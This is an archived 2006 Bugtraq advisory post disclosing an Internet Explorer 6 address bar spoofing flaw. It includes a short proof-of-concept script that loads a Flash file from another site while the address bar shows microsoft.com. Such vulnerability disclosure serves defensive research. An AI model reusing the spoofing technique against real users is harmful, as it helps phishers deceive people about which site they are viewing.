Home page logo
/

bugtraq logo Bugtraq mailing list archives

Another Internet Explorer Address Bar Spoofing Vulnerability
From: hainamluke () yahoo com
Date: 3 Apr 2006 18:29:02 -0000

DESCRIPTION:

I've found another Internet Explorer Address Bar Spoofing Vulnerability that can be exploited by phiser. This allow 
attacker inject a malcious shockwave-flash application into Internet Explorer while it is display another URL (even 
trusted sites).

If you are loading a shockwave-flash but it isn't loaded fully, you make change to the window.location, both of two 
resouces will be loaded at the same time and the Addess Bar display the new window.location. And when the old shockwave 
are loaded fully, this will activate the IE but the Address Bar isn't affected.

The vulnerability has been confirmed on a fully patched system with Internet Explorer 6.0 + Microsoft Windows XP SP2 
and previous versions. You may perform the test by yourself with my simple code.


SAMPLE CODE:

##### LukesTest.htm #####
<script language="javascript">
function pause(ms) 
{
        date = new Date();
        var curDate = null;

        do { var curDate = new Date(); } 
        while(curDate-date < ms);
} 

function spoof () {
         win    = window.open('http://www.microsoft.com/','new&apos;)
         pause (2000)
         win    = window.open('http://www.buctuong.com/swfs/index.swf','new&apos;)
         pause (2000)
         win    = window.open('http://www.microsoft.com/','new&apos;)
        
}
</script>
<a href="javascript: spoof()">Perform the test</a>
#########################

If you are vulnerable you will see the flash intro of buctuong.com while the address bar is http://www.microsoft.com/
If you have a very fast connection you may change my flash application to a larger one to make loading time take longer.

DISCOVERED BY:

Hai Nam Luke <hainamluke () yahoo com>
K46A - NEU, Hanoi


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]